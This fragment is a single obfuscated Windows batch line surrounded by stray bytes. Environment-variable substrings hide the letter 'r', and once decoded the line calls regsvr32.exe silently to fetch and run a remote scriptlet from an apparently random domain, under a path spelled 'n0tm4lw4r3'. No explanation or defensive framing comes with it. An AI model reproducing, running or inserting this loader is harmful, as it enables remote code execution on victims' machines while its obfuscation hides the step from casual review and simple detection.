  Ú Þ
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://zmXFHuUWlMyDCOwcpGYBhZAQnekixTqbg%ALLUSERSPROFILE:~4,1%sIaoLjENVfJPtvd%ALLUSERSPROFILE:~4,1%KS.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3   Ú Þ
